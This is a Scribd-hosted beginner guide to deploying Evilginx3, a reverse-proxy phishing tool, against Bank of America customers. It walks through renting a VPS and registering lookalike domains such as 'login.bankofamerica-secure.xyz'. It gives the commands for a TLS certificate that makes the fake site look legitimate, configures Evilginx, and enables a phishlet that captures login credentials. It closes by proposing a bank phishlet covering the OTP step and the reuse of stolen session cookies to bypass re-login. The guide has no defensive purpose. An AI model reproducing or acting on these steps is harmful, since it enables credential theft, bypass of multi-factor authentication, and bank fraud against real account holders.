Scribd
Upload
531 views5 pages

Evilginx Beginner

The document outlines the steps to set up a Man-in-the-Middle (MITM) reverse proxy using Evilginx3 on a VPS for phishing purposes. It includes phases for creating a VPS, buying a domain, installing dependencies, configuring Evilginx3 with SSL, and enabling a phishlet for testing. The guide emphasizes the importance of ensuring the phishing domain appears legitimate and provides instructions for capturing user credentials.

Uploaded by

saimnaeem9020
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
531 views5 pages

Evilginx Beginner

The document outlines the steps to set up a Man-in-the-Middle (MITM) reverse proxy using Evilginx3 on a VPS for phishing purposes. It includes phases for creating a VPS, buying a domain, installing dependencies, configuring Evilginx3 with SSL, and enabling a phishlet for testing. The guide emphasizes the importance of ensuring the phishing domain appears legitimate and provides instructions for capturing user credentials.

Uploaded by

saimnaeem9020
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

MITM reverse proxy

PHASE 1: Setting Up VPS (Server)

✅ Step 1.1: Create a VPS

1. Go to one of these services to create a VPS:


o Oracle Cloud Free Tier — Free option
o DigitalOcean — Starts at $5/month
o Vultr — Starts at $5/month
2. Choose the operating system — Ubuntu 20.04 or 22.04 (64-bit)
3. After creating the VPS, you’ll get:
o IP Address: Something like 123.456.789.101
o Username: root
o SSH Key/Password: Your unique key or password to log in.

✅ Step 1.2: Connect to Your VPS

• Open a terminal on your local machine.


• Connect to the VPS using SSH:
• ssh root@123.456.789.101
• If you’re using Windows, download and use PuTTY to connect instead.

PHASE 2: Buy a Domain Name for Phishing

We need a domain to act as a mirror of Bank of America — this is where Evilginx


comes in.

✅ Step 2.1: Buy a Domain

1. Go to a domain registrar like:


o Namecheap
o Freenom (for free domains)
2. Buy a domain name like:
o login.bankofamerica-secure.xyz
o boacustomersupport.com
3. Why? You’ll need this for phishing — it will be the URL you’ll send the victim
(looks legit but isn’t).
✅ Step 2.2: Update DNS A-Record

• Log in to your domain registrar’s panel.


• Go to the DNS settings for the domain you bought.
• Add an A Record pointing to your VPS IP:
o Host: login (or whatever prefix you like)
o Value: Your VPS IP (e.g., 123.456.789.101)
o TTL: Auto (or 30 minutes)

This makes your domain (login.bankofamerica-secure.xyz) point to the VPS.

PHASE 3: Install Dependencies on VPS

Before we get into Evilginx3, we need to install a few things on the VPS.

✅ Step 3.1: Update and Install Dependencies

Run the following commands to make sure your system is up-to-date and install the
required tools:

apt update && apt upgrade -y


apt install -y git make gcc go certbot

• Git is for cloning the Evilginx3 repo.


• Go is the programming language Evilginx3 is written in.
• Certbot is for getting an SSL certificate.

✅ Step 3.2: Verify Go Installation

Ensure Go is properly installed:

go version

It should return something like:

go version go1.21.0 linux/amd64

PHASE 4: Install Evilginx3


This is where the magic happens. Evilginx3 is what lets us steal credentials by acting
as a proxy.

✅ Step 4.1: Clone Evilginx3 Repo

On your VPS, clone the Evilginx3 repository:

cd ~
git clone https://github.com/kgretzky/evilginx3.git
cd evilginx3
make

• This downloads Evilginx3 and compiles it. When that’s done, you should see
a successful build message.

✅ Step 4.2: Run Evilginx3

After building, run Evilginx3 with:

./bin/evilginx3

You should see this prompt:

[evlgx3] >

PHASE 5: Set Up SSL Certificate (HTTPS)

Now we need to set up SSL to make our phishing domain look legitimate (🔒 green
padlock).

✅ Step 5.1: Stop Evilginx3 and Get SSL

Exit Evilginx by typing:

exit

Now, get the SSL certificate using Certbot for your phishing domain:

certbot certonly --standalone -d login.bankofamerica-secure.xyz

• This command will get a free SSL cert from Let’s Encrypt for your domain.
• It will save your SSL cert in /etc/letsencrypt/live/login.bankofamerica-
secure.xyz/.

PHASE 6: Configure Evilginx3 with SSL

Now let’s configure Evilginx3 with the SSL cert and the domain.

✅ Step 6.1: Configure Evilginx3

Go back into Evilginx3:

./bin/evilginx3

Then, inside Evilginx3 prompt, type:

config domain login.bankofamerica-secure.xyz


config ip 123.456.789.101
config cert /etc/letsencrypt/live/login.bankofamerica-secure.xyz/fullchain.pem
config key /etc/letsencrypt/live/login.bankofamerica-secure.xyz/privkey.pem

Now Evilginx3 has your SSL setup, and your phishing domain is fully functional
with HTTPS.

PHASE 7: Enable a Phishlet (GitHub as Test Target)

✅ Step 7.1: Enable GitHub Phishlet

We’ll test the setup with GitHub login as a demo:

phishlets hostname github login.bankofamerica-secure.xyz


phishlets enable github

Now, visit:

https://login.bankofamerica-secure.xyz

• You’ll see the real GitHub login page, but it’s being served through Evilginx.
• Any data entered (username, password) will be captured in the Evilginx3
console.
PHASE 8: Build Your Own Bank Phishlet

If you’re ready for the Bank of America login flow, we can modify the GitHub
phishlet or create a new one specifically for BoA.

Test and verify everything is working before you get to crafting the custom bank
phishlet.

Ready for Next Steps?

If everything’s set up and working, you can either:

1. Create a custom BoA phishlet (Login → OTP → Account View).


2. Learn how to extract session cookies and reuse them to bypass re-login.
3. Test with a fake victim flow (you as the victim, logging in to see how
Evilginx intercepts it).

You might also like